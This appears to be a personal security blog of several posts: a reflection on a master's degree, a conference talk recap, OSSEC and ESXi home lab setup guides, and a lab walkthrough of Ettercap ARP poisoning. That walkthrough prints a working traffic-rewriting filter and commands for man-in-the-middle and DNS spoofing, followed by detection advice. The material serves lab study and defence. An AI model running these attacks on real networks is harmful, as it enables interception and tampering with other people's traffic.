22 January, 2019

What I learned when I earned a Masters

First, a disclaimer. I am employed by CMU but these views are mine. This is my perspective as a student, but it is impossible to ignore that I am also an employee.

In 2016, I finally decided to return to get a MS after getting a BS in Information Systems Management on an Information Assurance track in 2007. In December, 2018, I graduated with highest distinction. CMU has a good tuition benefits program and one of my incentives when I accepted employment included the possibility of graduate school.

For various reasons, a distance curriculum was best for me, so I ended up taking the GRE and going to Heinz College to get a MSIT: Information Security & Assurance.

This is the description from CMU's page, "Is MSIT Right For Me?"

The Master of Science in Information Technology (MSIT) is a part-time, distance learning program that is ideal for current IT professionals seeking to add business acumen, management, and targeted problem-solving skills to their portfolios. MSIT can also be a great fit for professionals from less technical areas, such as finance and health care, who wish to pivot toward technology-intensive roles and improve their analytical skills.
After completing the program, I would say the description above is fairly accurate and useful. In particular, this degree had a few things that appealed to me.
  1. It was at CMU, my employer, so tuition would be free with the caveat of counting as taxable income.
  2. It is geared towards working students.
  3. The degree offered some flexibility in focus and electives.
The last allowed me to choose the Information Security & Assurance track, plus balance classes between those focused on the business side and technical classes. Since I can take short technical classes as part of professional development at work, I decided it made sense to focus on the business, management, and leadership more while focusing my technical classes in areas where I wanted to improve or get more depth than I would through professional development classes.

Technical classes

There were a couple areas involving technology or math where I knew that the CMU classes would be challenging and cover material I wouldn't normally have time to learn through professional development. Some were full semesters and some were half semester classes, called "minis" by Heinz College.

I focused on a few areas in my technical classes. These were areas where I thought I could use more formal teaching, might be directly related to my work, or in subjects where I thought justifying professional development would be difficult but the classes would still have some application in my career. The highlights that I think were most useful for me included the following.
  • An object-oriented programming class using Java.
  • An economic analysis class that started with more general economics then focused on the economics of IT, including implications for management and strategy.
  • A useful refresher on statistics covering descriptive statistics, statistical inference, and regression analysis, including applying statistical analysis to analyze IT problems. This also was a prerequisite for some other courses.
  • Exploring and visualizing data was very relevant to my current job and this class was focused primarily on exploring data sets using R. I had used R previously, but this class let me do a lot more and I enjoyed the final project.
  • Geographic information systems (GIS) was a very fun course, though I'm not sure I will use a lot of the skills directly. It did help me appreciate how much goes into geographic data analysis and information displays and teach me some lessons that apply to information presentation across disciplines.
  • Penetration testing was probably the class where my motivation for enrolling was closest to, "I want something that will be technical and fun." It was a fun class, but also very tough and frustrating at times when getting stuck on the challenge labs


Business, leadership, and policy classes 

The other classes were in areas I thought would benefit me and my career because they were in areas where I might have had experience, but little formal education or knowledge. Examples include:
  • Privacy in the digital age was a great class focusing on privacy that, "...combines technical, economic, legal,and policy perspectives to present a holistic view of its role and value in the digital age (from the syllabus)." It was a very useful class for anyone in information security given the privacy issues in today's world, many of them having direct impact on how we do our jobs in information security.
  • I learned a fair amount on strategy development for organizations and businesses, which included useful lessons and the history of creating organizational strategies. It used case studies really well to show the impact that an effective organizational strategy can bring.
  • Almost anyone will improve by taking a good writing class, so I was happy to take business writing for leaders even though I find writing courses somewhat stressful. I'm used to writing many papers, but writing for a writer, the professor in this case, can be intimidating.
  • Several courses covering information security management, governance, process, policies, and risk management. Most of these were required as part of the Information Security & Assurance focus.
This doesn't cover all of my classes, which I think ended up being about 16-18 classes total, mixing full semester classes and minis.

Do you need a degree or certification?

Why am I writing about this? Because there is an ongoing discussion through the field of information security ("cybersecurity") about the relevance of degrees, certifications, and other credentials. There are also related questions about how people should enter the career of cybersecurity. My answer to any question about what someone needs will always be situational. Individual circumstances will make a huge difference in any examination of the cost/benefit for a specific degree or certification. Context is the key to answering questions about career transition, degrees, and certifications, because no one answer is correct for everyone.

In my case, the pro-degree arguments, benefits, or positive implications were:
  • I work for a university, so graduate degrees are encouraged and valued.
  • Employee benefits include free tuition at CMU.
  • The degree was available online, allowing a flexible school schedule.
  • The degree offered many classes that were useful towards improving myself as a professional.
  • I saw the potential to make myself more valuable as a mid- to late career professional.
  • I saw the potential to refresh skills I already have or learn new skills.
  • It provided a chance to take some longer-running technical classes that allowed more depth than typical professional development.
Some of the costs or drawbacks included:
  • It took a lot of time out of my life. The recommendation was to budget 12 hours per week per class, and that was fairly accurate. Some classes were a little less, some were much more.
  • Despite the free tuition, it still cost me money in books, time, and tax liability.
  • It was very stressful for me, particularly since I wasn't satisfied with simply passing but was trying to excel.
  • A small number of the classes covered fair chunks of material where I already have extensive experience, making them somewhat less interesting.
Given all this and more, I think it was the right decision for me. I started seeing the benefit of applying some of my learning at my work while still in school and I expect to continue leveraging some of the material going forward. It also made me examine my career and think more about where I want to go in the future. I could have pursued a more purely technical degree or even more on the business side instead of the mixed program, but I think I made the correct choice for my background and future goals.

What should you consider when trying to decide about a degree or certifications? I covered a lot of it in my benefits and costs, including time, cost, personal situation, professional situation, goals, and intangibles. I think certifications are generally a good way for earlier career professionals to boost their credentials a bit and I had a number of them when I first entered IT. Some jobs obviously require certifications, making the decision fairly simple. Some certifications are also more useful than others, so that can enter into the equation. The costs and benefits of a degree are generally both more significant but the basic factors to consider are similar.

For underrepresented groups, degrees and certifications are often much more important because of disparities in opportunities. I got a MCSE, CCNP, and SANS certifications early in my career but was able to get into IT without a degree and without either of those certifications complete. Not everyone, even when they're capable, will get those opportunities.

I started in IT nearly 20 years ago so my analysis entering the field today would also be different. I did three interviews and got three offers when I was looking for my first IT job, but degrees and certifications have become more typical requirements or wants in recent years. None of my old Microsoft and Cisco certifications are current today and it likely has little impact on my credentials given my experience and degrees. It would likely be a different story if I was still early in my career or switching careers.

I will also point out is that I don't see how having a degree or certification should ever count against someone unless it is literally a scam like a diploma mill or something similar. Someone who earnestly gets a well-known and honest certification should not be looked down upon. The MCSE, CCNP, and SANS certifications all taught me a lot and forced me to also teach myself to successfully pass the exams.

What's next?

One thing we can probably all agree with is that cybersecurity requires constant learning and change to be successful. The IT environment today is drastically different than when I entered the field. While many of the baseline skills remain constant, the evolution of IT, for example from Windows NT to Active Directory to IT infrastructure in the cloud, mean that we better be learning so we adapt to our skills to current environments and technologies. For me, the first step is always self-study, reading, and experimentation, but this is not the only answer for developing skills and expertise.

Since I am done with school, I'll likely be pursing professional development in technical areas to improve the depth of my skills. This will likely include a certification or two as a way to set a goal and timetable for learning specific topics. Examples of general topics like cloud security, cloud architecture, machine learning, security orchestration, edge computing, and mobile computing are all areas that are currently in flux and will require professionals to make changes as the technologies continue maturing. Everyone in cybersecurity needs methods to stay current in the face of changing technology.

05 March, 2015

Reflections on BSidesDC 2014 Talk: Meatspace Indicators and IR

This is long overdue, but I finally am posting a recap of my BSidesDC talk from October 2014. The talk was based on my previous blog post, A Practical Example of Non-technical Indicators and Incident Response. For my BSidesDC talk, I tweaked the title slightly to "Meatspace Indicators and Incident Response: A Story From the Lab of Nate Richmond."

Overall, I think the talk went well. To give people an idea of preparation, I did two dry runs of the talk. The first was for my coworkers, who then gave me valuable feedback on the content and suggestions for improvements. It also gave me a good idea whether the material filled the time I had for my talk. Whether or not you're giving a talk sponsored by your employer, it's a great idea to get feedback from peers before submitting or giving the talk.

Since the talk used my family as an example, I also did a dry run for them after modifying the content based on the feedback my coworkers gave to me. The main reason to give the talk to my family was to make sure they were all comfortable with what I said during the talk, but also to get some feedback and be fully transparent with them about what I do with our home network.

I felt slightly guilty about using material from a couple years ago for a conference, but in the end I decided it was still relevant. I think the material was very well-suited for BSides rather than a larger conference.

I embedded the video from YouTube below. After the video, I have some comments and critiques of my talk that I noted when watching the video. It can be very painful to watch and listen to yourself, particularly for those of us who are driven to be good at the things we do and thus are very critical of ourselves, but it's always important to review what you've done so you can do it better the next time. I definitely missed a few points that I had in my notes and also rushed a bit, finishing 10 minutes early. I probably should have done at least one more dry run.

I hope it was informative, useful, and entertaining for those that attended or watched later.

I'd very much like to thank BSidesDC for having me. I enjoyed the conference both as a speaker and an attendee. I highly recommend checking out your local BSides if you get the chance. I like their focus on community, collaboration, and keeping the cost for attendees to a minimum.

The "Introduction" slide was meant in part to set up a short musing on the stickers people put on the backs of their cars to represent their family. Sorry if you have these, but they really bug me for some reason.

I think I did emphasize my two main points, which are that security practitioners sometimes forget their goals in terms of supporting the business they're protecting, and that we also can be overly focused on the latest technology when there are many indicators of compromise that require no technology at all.

If I gave this talk again, I would add a slide after "Additional Context" to show a little more about my home lab architecture. It would have made sense to leverage a little material from my blog posts New Home Lab Configuration and Home Lab Part 2. I did have links to these posts in my presentation but forgot to point them out to my audience. I also had intended to point out the evolution of my lab from a stand-alone Sguil installation running on a 700MHz w/512MB RAM prior to the creation of Security Onion to its current incarnation using virtual machines on a much faster machine.

Regarding Terms of Service and expectations of privacy, I firmly believe in what I stated during the presentation. Whether it's a business or personal network, it's very important to let your users know what is expected of them and also what is expected of those monitoring the network. It's also important for those doing network monitoring to properly adhere to these terms. When network monitoring and incident response is part of your job, you should not be taking advantage of your access to root around in people's personal business for fun. You should only be doing what is required to effectively do your job.

During the discussion of the changing landscape and countermeasures, I forgot to repeat the comments from the audience. This bothers me since I had explicitly reminded myself beforehand to repeat comments so everyone could hear them. If you are ever a presenter and the audience doesn't have microphones, please try to repeat any substantial questions or comments for the rest of the audience.

Finally, I had some other examples and discussion for the slide about "Why Does This Matter?" but neglected to glance at my notes. The bottom line is that we sometimes get caught up in the mentality of "nuke entire the site from orbit--it's the only way to be sure" rather than examining other possibilities that would still be effective but less disruptive to the business.

14 May, 2013

More Ettercap and ARP Poisoning

My previous post about Ettercap gets a lot of hits, so I thought I should post a deeper look at some of the features with examples of usage. Before continuing, I'll point out a couple other good resources since some of my work is just building on that of others.

Irongeek has a couple good pages dealing with Ettercap.

There is plenty more information there if you search his site, plus a number of other sites and forums where you can find information.

I decided to show a couple examples, then relate them to NSM and ways to detect ARP poisoning. I happen to be using FreeBSD as the attacking system in this case, and a Windows 7 system as the targeted system. For my experiment, I'll use the following image.

Here is the filter I used to replace the page title and body with my own title and body. It includes segments from Irongeek's filter, so I'll include the GPL notice.

#                                                                          #
#  nr.filter -- filter source file                                         #
#  Based on work by Irongeek and others http://www.irongeek.com/           #
#                                                                          #   
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
if (ip.proto == TCP && tcp.dst == 80) {  
   if (search(DATA.data, "Accept-Encoding")) {  
    replace("Accept-Encoding", "Accept-Rubbish!");   
      # note: replacement string is same length as original string  
    msg("zapped Accept-Encoding!\n");  
   if (search(DATA.data, "gzip")) {  
    replace("gzip", "  ");  
    msg("whited out gzip!\n");  
 if (ip.proto == TCP && tcp.src == 80) {  
   replace("<title>", "<title>PWNED<\/tITle><bodY><p><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg"></p></boDY>");  
   replace("<TITLE>", "<title>PWNED<\/tITle><bodY><p><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg"></p></boDY>");  
   replace("</title>", " ");  
   replace("</TITLE>", " ");  
   replace("<body>", " ");  
   replace("<BODY>", " ");  
   msg("Filter Ran.\n");  
This filter is designed to replace the "title" tag with a new title plus a body that links to the image. Then at the end of the filter, I attempt to replace the original page's title closing tag with a space since I already closed the tag, and then replace the original page's body tag with a space to eliminate the body of the page. I believe you could also use a pcre_regex command in the filter to more thoroughly remove the existing page body after inserting the image or other content of your choosing. See the etterfilter manual page for more.

To compile the filter, I simply execute the following:
$ etterfilter nr.filter -o nr.ef

Then to run ettercap on a FreeBSD VM in this example, I execute the following:
$ sudo ettercap -i em0 -F nr.ef -T -M arp:remote / /

The "-T" option is to use the text interface rather than the GUI or ncurses. The "-M" executes a man-in-the-middle with the arguments for ARP poisoning that includes the gateway, which is the first IP address in this case. The second IP address is a Windows system.

Here are some examples of the results if trying to surf using Chrome on the targeted Windows 7 system.

Notice the title is not changed on Slashdot, indicating they do not use a traditional
HTML title tag. The body is also not replaced, just pushed down the page.
Here is what Google looks like.


Finally, here is my blog.

Success once again. Both the page title and body are replaced.
Another way to show how easy it is to redirect traffic to an unexpected site is with ettercap's DNS spoofing plugin. First, I edit /usr/local/share/ettercap/etter.dns and add the following lines.

facebook.com       A
*.facebook.com     A
www.facebook.com   PTR

google.com     A
*.google.com   A
www.google.com PTR

Then I run ettercap with the plugin enabled.
$ sudo ettercap -i em0 -P dns_spoof -T -M arp:remote / /

This 20 second video shows what happens when I then try to go to Google or Facebook from the targeted system.

This can be fairly amusing, particularly if you are on a lab network where shenanigans are not only acceptable but expected. On the other hand, imagine injecting something more malicious than a funny image like a malicious iFrame or malicious Javascript. I played around with injecting Javascript into pages and it really is trivial if you're in a position to poison the network gateway. A good old-fashioned Rickroll is another good way to demonstrate the attack in a non-malicious way.

As I mentioned in a previous post about ettercap,  the Metasploit site was briefly owned through ARP poisoning in 2008. It is an old-school attack that can still be quite effective if you have access to a system on the same network segment as another system you want to attack.

Defenses against ARP poisoning are fairly simple to describe but not necessarily practical or easy to implement. The first, mentioned in the Metasploit article, is using static ARP tables so ARP requests over the network are no longer necessary. This may be simple in the case of a single gateway entry, but the larger the network the more administrative overhead to use static ARP entries.

You can also use software to detect ARP poisoning, for example LBNL's arpwatch. Any software that can show you MAC addresses along with IP addresses can potentially be used to detect poisoning since you would see the same IP address in use by multiple MAC addresses. For example, here is what my ARP poisoning with ettercap looks like in Wireshark.

You can see that the poisoner, 00:0c:29:6d:92:78, is associated with both IP addresses.
So, it is easy to see in the traffic but that doesn't mean it is necessarily easy to detect without some analyst intervention. Snort has an ARP spoofing preprocessor, but it seems likely that an IDS will often be in the wrong position on a network to see ARP traffic. In fact, most networks are probably not instrumented in such a way that you can see ARP traffic on a NSM sensor. It is not actually difficult in a technical sense, but it does require resources to have internal network sensors and make sure the network is architected properly for the sensors to have visibility. There are probably more efficient ways to allocate resources for detection in this case.

There are still other methods to help detect and prevent ARP spoofing, particularly with network equipment like managed switches. Jeremy Stretch has a good write-up on DHCP Snooping and Dynamic Arp Inspection over at his PacketLife blog showing exactly how DAI can be used to prevent and detect ARP poisoning. You can also read about DHCP Snooping and DAI on Cisco's site. This seems like it may be an easier method than IDS deployments since networking equipment is already positioned to see ARP traffic, but it does require equipment that supports ARP inspection.

I had originally thought of also showing how you could combine Ettercap with Metasploit to inject malicious traffic and more in the above examples, but I decided that would overly complicate this post. It is probably better reserved for a future post.

01 May, 2013

Installing OSSEC agent

With the recent news about the latest Apache backdoor on systems using cPanel, I thought it would be pertinent to show the process of adding an OSSEC agent that connects to a Security Onion server. Why is this relevant? Because OSSEC and other file integrity checkers can detect changes to binaries like Apache's httpd.

"OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response."
Many systems include integrity checking programs in their default installs these days, for instance Red Hat with AIDE. AIDE is also available in repositories for a number of other Linux distributions plus FreeBSD.

This case in particular would require using something other than the default options for integrity checking because cPanel installs Apache httpd in /usr/local/apache/bin, a non-standard directory that may not be automatically included when computing file hashes and doing subsequent integrity checks.

The reason I'm demonstrating OSSEC here is that it easily integrates with the Sguil console, and in Security Onion the sensors and server already have OSSEC configured to send alerts to Sguild. OSSEC also has additional functionality compared to AIDE. In this case, I'm installing the agent on a Slackware server.
$ wget http://www.ossec.net/files/ossec-hids-2.7.tar.gz


 $ openssl sha1 ossec-hids-2.7.tar.gz
SHA1(ossec-hids-2.7.tar.gz)= 721aa7649d5c1e37007b95a89e685af41a39da43
 $ tar xvzf ossec-hids-2.7.tar.gz


 $ sudo ./install.sh

  OSSEC HIDS v2.7 Installation Script - http://www.ossec.net

 You are about to start the installation process of the OSSEC HIDS.
 You must have a C compiler pre-installed in your system.
 If you have any questions or comments, please send an e-mail
 to dcid@ossec.net (or daniel.cid@gmail.com).

  - System: Linux webserver 3.8.4
  - User: root
  - Host: webserver
   -- Press ENTER to continue or Ctrl-C to abort. --

 1- What kind of installation do you want (server, agent, local, hybrid or help)? agent
  - Agent(client) installation chosen.

 2- Setting up the installation environment.

  - Choose where to install the OSSEC HIDS [/var/ossec]:
 3- Configuring the OSSEC HIDS.

   3.1- What's the IP Address or hostname of the OSSEC HIDS server?:
  - Adding Server IP

   3.2- Do you want to run the integrity check daemon? (y/n) [y]:

    - Running syscheck (integrity check daemon).

   3.3- Do you want to run the rootkit detection engine? (y/n) [y]:
 - Running rootcheck (rootkit detection).

   3.4 - Do you want to enable active response? (y/n) [y]:

3.5- Setting the configuration to analyze the following logs:
    -- /var/log/messages
    -- /var/log/auth.log
    -- /var/log/syslog
    -- /var/adm/syslog
    -- /var/adm/auth.log
    -- /var/adm/messages
    -- /var/log/xferlog
    -- /var/log/proftpd.log
    -- /var/log/apache/error_log (apache log)
    -- /var/log/apache/access_log (apache log)
    -- /var/log/httpd/error_log (apache log)
    -- /var/log/httpd/access_log (apache log)

  - If you want to monitor any other file, just change
   the ossec.conf and add a new localfile entry.
   Any questions about the configuration can be answered
   by visiting us online at http://www.ossec.net .

   --- Press ENTER to continue ---


- Init script modified to start OSSEC HIDS during boot.
 - Configuration finished properly.
 - To start OSSEC HIDS:
                /var/ossec/bin/ossec-control start
 - To stop OSSEC HIDS:
                /var/ossec/bin/ossec-control stop
 - The configuration can be viewed or modified at /var/ossec/etc/ossec.conf

    Thanks for using the OSSEC HIDS.
    If you have any question, suggestion or if you find any bug,
    contact us at contact@ossec.net or using our public maillist at

    ( http://www.ossec.net/main/support/ ).

    More information can be found at http://www.ossec.net

    ---  Press ENTER to finish (maybe more information below). ---

 - You first need to add this agent to the server so they 
   can communicate with each other. When you have done so,
   you can run the 'manage_agents' tool to import the 
   authentication key from the server.


   More information at: 

Next, I add the agent to my Security Onion server.
$ sudo /var/ossec/bin/manage_agents 

* OSSEC HIDS v2.6 Agent manager.     *
* The following options are available: *

   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).

Choose your action: A,E,L,R or Q: A

- Adding a new agent (use '\q' to return to the main menu).

  Please provide the following:
   * A name for the new agent: webserver
   * The IP Address of the new agent:
   * An ID for the new agent[001]: 

Agent information:

   IP Address:

Confirm adding it?(y/n): y

* OSSEC HIDS v2.6 Agent manager.     *
* The following options are available: *

   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).

Choose your action: A,E,L,R or Q: e

Available agents: 

   ID: 001, Name: webserver, IP:

Provide the ID of the agent to extract the key (or '\q' to quit): 001

Agent key information for '001' is: 


** Press ENTER to return to the main menu.

Now copy the key, go back to the web server, paste and import the key.
$ sudo /var/ossec/bin/manage_agents 

* OSSEC HIDS v2.7 Agent manager.     *
* The following options are available: *

   (I)mport key from the server (I).

Choose your action: I or Q: i

* Provide the Key generated by the server.
* The best approach is to cut and paste it.
*** OBS: Do not include spaces or new lines.

Paste it here (or '\q' to quit): ---snip---

Agent information:
   IP Address:

Confirm adding it?(y/n): y

If I was running a system with cPanel that was vulnerable to Cdorked.A then I would want to make sure OSSEC is monitoring the directories with the Apache httpd files. The OSSEC default configuration from my recent install is /var/ossec/etc/ossec.conf and the relevant lines are below:
    <!-- Frequency that syscheck is executed - default to every 22 hours -->
    <!-- Directories to check  (perform all possible verifications) -->
    <directories check_all="yes">/etc,/usr/bin,/usr/sbin</directories>
    <directories check_all="yes">/bin,/sbin</directories>

So by default OSSEC would apparently not be checking the integrity of cPanel's Apache installation and I would need to add /usr/local/apache to the directory checks. After making any changes for my particular system, I check the status of OSSEC and it is not yet running.
$ sudo /etc/rc.d/rc.ossec status
ossec-logcollector not running...
ossec-syscheckd not running...
ossec-agentd not running...
ossec-execd not running...
$ sudo /etc/rc.d/rc.ossec start 
Starting OSSEC HIDS v2.7 (by Trend Micro Inc.)...
Started ossec-execd...
Started ossec-agentd...
Started ossec-logcollector...
Started ossec-syscheckd...

Note after adding the OSSEC agent on the remote system then adding it on the OSSEC server, you must restart ossec-hids-server in order for the ossec-remoted process to start listening on 1514/udp for remote agents.
$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted not running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
$ sudo /etc/init.d/ossec-hids-server restart
Killing ossec-monitord .. 
Killing ossec-logcollector .. 
ossec-remoted not running ..
Killing ossec-syscheckd .. 
Killing ossec-analysisd .. 
ossec-maild not running ..
Killing ossec-execd .. 
OSSEC HIDS v2.6 Stopped
Starting OSSEC HIDS v2.6 (by Trend Micro Inc.)...
OSSEC analysisd: Testing rules failed. Configuration error. Exiting.
2013/04/30 23:13:59 ossec-maild: INFO: E-Mail notification disabled. Clean Exit.
Started ossec-maild...
Started ossec-execd...
Started ossec-analysisd...
Started ossec-logcollector...
Started ossec-remoted...
Started ossec-syscheckd...
Started ossec-monitord...

$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted is running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...

$ netstat -l | grep 1514
udp        0      0 *:1514                  *:*    

Note the error corresponding to the FAQ entry about getting an error when starting OSSEC. However, since I'm running OSSEC 2.7 this did not seem to apply. Poking around, I realized the ossec-logtest executable had not been copied to /var/ossec/bin when I ran the install script. After I manually copied it to the directory, restarting OSSEC no longer caused the "Testing rules failed" error.

Once you have installed OSSEC on the system to be monitored, added the agent on the server, imported the key on the system to be monitored, restarted the server process, and started the client process, you will start getting alerts from the newly added system in Sguil. For example, the content of Sguil alerts will look like this after updating gcc:
Integrity checksum changed for: '/usr/bin/gcc'
Old md5sum was: '764a405824275d806ab5c441516b2d79'
New md5sum is : '6ab74628cd8a0cdf84bb3329333d936e'
Old sha1sum was: '230a4c09010f9527f2b3d6e25968d5c7c735eb4e'
New sha1sum is : 'b931ceb76570a9ac26f86c12168b109becee038b'

In the Sguil console, if I wanted to view all the recent OSSEC alerts I could perform a query as pictured below. Note you need to escape the brackets or remove them in favor of the MySQL wildcards '%%'.

Finally, to show an example of the various types of alerting that OSSEC can do in addition to checksum changes, here is a query and output directly from the MySQL console.
mysql> SELECT count(signature),signature FROM event WHERE signature LIKE '%%OSSEC%%' GROUP BY signature ORDER BY count(signature) DESC;
| count(signature) | signature                                                                             |
|              388 | [OSSEC] Integrity checksum changed.                                                   |
|              149 | [OSSEC] Host-based anomaly detection event (rootcheck).                               |
|               46 | [OSSEC] Integrity checksum changed again (2nd time).                                  |
|               39 | [OSSEC] IP Address black-listed by anti-spam (blocked).                               |
|               12 | [OSSEC] Integrity checksum changed again (3rd time).                                  |
|                4 | [OSSEC] Web server 400 error code.                                                    |
|                3 | [OSSEC] Receipent address must contain FQDN (504: Command parameter not implemented). |
7 rows in set (0.00 sec)
The highest count alert, plus the alerts indicating "2nd time" and "3rd time", are the basic functionality needed to detect changes to a file, my original use case. The "rootcheck" is alerting on files owned by root but writable by everyone. The balance of the alerts are from reading the system logs and detecting the system rejecting emails (anti-spam, 504) or web server error codes.

Back to the original problem of Cdorked.A, the blog posts on the subject also indicate that NSM could detect unusually long HTTP sessions, and there are no doubt other network behaviors that could be used to create signatures or network analytics resulting in detection. File integrity checks are just one possible way to detect a compromised server. Remember you need to have known good checksums for this to work! You ideally install something like OSSEC prior to the system being live on the network or at the least prior to it running any listening services that could be compromised before computing the checksums.

22 April, 2013

Home Lab Part 2: VMware ESXi, Security Onion, and More

As I stated in my previous post about a new home lab configuration, I decided to try VMware ESXi 5.1 on my new Shuttle SH67H. ESXi is free for uses like this, presumably because it clearly benefits VMware if professionals can use it in a lab setting and that encourages use of their paid products in production. I have seen some conflicting accounts, but it appears that the main limit on the free version of ESXi 5.1 is 32GB of RAM.

I won't go into too much detail about the installation since it is adequately covered by a couple of other posts I found prior to purchasing my system.

I will mainly cover details that stood out and things I discovered as someone new to ESXi.

I had already planned to get a Shuttle for the small form factor, low noise, and low power usage. Finding out that the SH67H could be used as a white box for ESXi made it easy to pick an initial project once I built the system. (Okay, we could quibble over whether a Shuttle counts as a white box). Additionally, since my previous home network sensor running Sguil had died, I figured that the first VM to build would be Security Onion but that I'd still be able to run multiple other VMs without impacting my home lab NSM.

Getting ESXi installed on the Shuttle was pretty simple. After booting to CD, I just followed the prompts and made sane choices. The one thing to note is that I installed ESXi to an external USB flash drive. Since the OS is so small, it gets loaded primarily to RAM at boot anyway. Using a flash drive has some advantages and some disadvantages, as shown in many discussions on the VMware and other discussion boards. For my home lab I decided to install to the flash drive, but chances are that it will actually make no difference to me. Some ESXi servers have no local storage, so I imagine it is particularly common for those systems to use a USB flash drive.

After using directly connected keyboard and monitor, I moved the system into my home "server closet" and booted it headless. I installed the vSphere Client on my local Windows VM since I don't have a non-VM Windows installation. The vSphere Client was surprisingly easy and I might even go as far as user-friendly. You can see in the screenshot below that it is relatively straightforward.
The error states "System logs on host vmshuttle are stored on non-persistent storage."
The first thing I noticed was, because of installing ESXi to the flash drive, I got the error shown in my screenshot.

This error was only temporary. I am not sure when it was resolved, most likely after a reboot or I created the initial guest VM, but the system created a ".locker" directory in which I can clearly see all the logs. I am assuming they are persistent since vmstore0 is the internal 1TB hard drive, not the USB flash drive.

# cd /vmfs/volumes/vmstore0/
# ls -l .locker/
drwxr-xr-x    1 root     root           280 Apr  7 16:01 core
drwxr-xr-x    1 root     root           280 Apr  7 16:01 downloads
drwxr-xr-x    1 root     root          4340 Apr 16 02:15 log
drwxr-xr-x    1 root     root           420 Apr  7 16:01 var

I believe another option for fixing the error would be to manually set the scratch partition as detailed in VMware's Knowledge Base. Note that I haven't actually tried that to date.

Before being able to SSH into the ESXi host and look at the above directories and files, I had to enable SSH. The configuration for SSH and a number of other security-related services is available in vSphere by highlighting the host (since in the workplace you may use vSphere to manage multiple ESXi systems), then going to the Configuration tab, Security Profile, and finally SSH Properties. If you haven't noticed already, ESXi defaults to using root for everything. I haven't yet investigated the feasibility of locking down the ESXi host, but I think it's safe to say most people will rely on keeping the host as isolated as possible since the host OS is not particularly flexible or configurable outside options VMware provides.

I decided the best way to use vSphere would be to copy my Windows 7 VM from my laptop to the ESXi host. Trying to scp the VM then adding it to the inventory never worked properly. I had similar problems when trying to scp a CentOS VM from my laptop. When I tried browsing the datastore in vSphere and adding a local machine to the remote inventory, it would get partway through and then fail with an I/O error. I believe this was all actually a case of a flaky wireless access point, but even in cases where I successfully copied the CentOS VM I got errors when trying to add it to the inventory.

I eventually got it to work by converting the VM locally using ovftool then deploying it to ESXi. OVF is the Open Virtualization Format, an open standard for packaging virtual machines. The syntax to convert an existing VM is simple. First, make sure the VM is powered down rather than just paused. On OSX running VMware Fusion, you can export a VM easily.

~ nr$ cd  /Applications/VMware\ Fusion.app/Contents/Library/VMware\ OVF\ Tool/ovftool
~ nr$ ./ovftool -dm=thin ~/Documents/Virtual\ Machines.localized/Windows\ 7\ x64.vmwarevm/Windows\ 7\ x64.vmx ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf

After the conversion, the VM still needed to be exported to the ESXi host. I plugged my laptop into a wired connection to speed the process and eliminate any issues I was having over wireless, then sent the VM to ESXi. The options I used are to set the datastore, disk mode, and network.

~ nr$ ./ovftool -ds=vmstore0 -dm=thin --network="VM Network 2" ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf vi://

Once the VM is copied to the host, you will need to browse the datastore and add the VM to the ESXi inventory. Other ways to move a VM to ESXi are not endorsed by VMware. They officially recommend using OVF to import VMs.

All things considered, getting ESXi installed and configured was relatively easy. There are certainly drawbacks to using unsupported hardware. For example, vSphere does not display CPU temperature and other health or status information. I believe ESXi expects to use IPMI for hardware status like voltages, temperatures, and more. There are options to consider for anyone wanting a home lab using supported hardware. VMware maintains a lengthy HCL and I presume systems on their list support all the health status information in vSphere. I did find several possibilities to buy used servers like a Dell PowerEdge 2950 at reputable sites for about $650. Since I didn't want the noise, don't have a rack, and may not keep the system as a dedicated ESXi host, I did not go that route for a lab system.

Building a Security Onion VM

As stated, the first VM I built was Security Onion. I did this through the vSphere client and include some screenshots here. Most of this applies to building any VM using vSphere.

After choosing the option to create a new VM, I selected a custom configuration. I named the VM simply "Security Onion" and chose my only datastore, vmstore0, as the storage location. I am not concerned with backwards compatibility, so chose "Virtual Machine Version 8." I chose only one core and one socket for the CPU, but allocated 4GB of RAM since I knew the combination of Suricata, Bro, and other monitoring processes would eat a lot of RAM. I was installing 64-bit, so I chose 64-bit Ubuntu as the Linux version. 
Choosing the number of NICs, network, and
adapter to use when initially configuring the VM
I selected two NICs both using VMXNET 3, which was probably the first non-standard selection in my custom configuration. I wanted to make sure I had separate management and promiscuous mode NICs since this will be a sensor. The option for VMXNET 3 should not be available as a choice if you previously selected an OS that doesn't support it when you created the VM.

I next chose the LSI Logic SAS for the SCSI Controller. Although I think it won't matter for Ubuntu, note the following from VMware's local help files.
"The LSI Logic Parallel adapter and the LSI Logic SAS adapter offer equivalent performance. Some guest operating system vendors are phasing our support for parallel SCSI in favor of SAS, so if your virtual machine and guest operating system support SAS, choose LSI SAS to maintain future compatibility."
This is a good time to point out that hitting the "Help" button in vSphere will open the local help files in your browser, and they contain actual useful information about the differences in choices when configuring the VM. In the case of the help button during the process of creating a new VM, it will actually open the specific page that is contextually useful for the options on the current step of the process. In general, both their help files and the Knowledge Base seem quite useful.

